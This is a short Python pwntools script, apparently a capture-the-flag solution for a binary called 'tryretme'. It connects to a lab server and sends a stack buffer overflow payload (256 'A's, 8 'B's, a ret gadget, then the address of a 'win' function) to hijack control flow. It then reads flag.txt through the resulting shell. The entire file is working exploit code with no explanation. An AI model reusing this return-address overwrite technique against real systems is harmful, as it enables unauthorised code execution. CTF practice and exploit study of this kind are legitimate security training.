24 lines
531 B
Python
24 lines
531 B
Python
from pwn import *
|
|
|
|
context.update(os="linux", arch="amd64", log_level="error")
|
|
context.binary = binary = ELF("./tryretme", checksec=False)
|
|
|
|
r = remote("10.10.170.21", 9006)
|
|
|
|
rop = ROP(binary)
|
|
ret = rop.find_gadget(["ret"])[0]
|
|
win_function_address = binary.symbols["win"]
|
|
|
|
payload = b"A" * 256
|
|
payload += b"B" * 8
|
|
payload += p64(ret)
|
|
payload += p64(win_function_address)
|
|
|
|
r.recvuntil(b"Return to where? : \n")
|
|
r.sendline(payload)
|
|
r.recvuntil(b"ok, let's go!\n\n")
|
|
|
|
r.sendline(b"cat flag.txt")
|
|
print(r.recvline().decode())
|
|
r.close()
|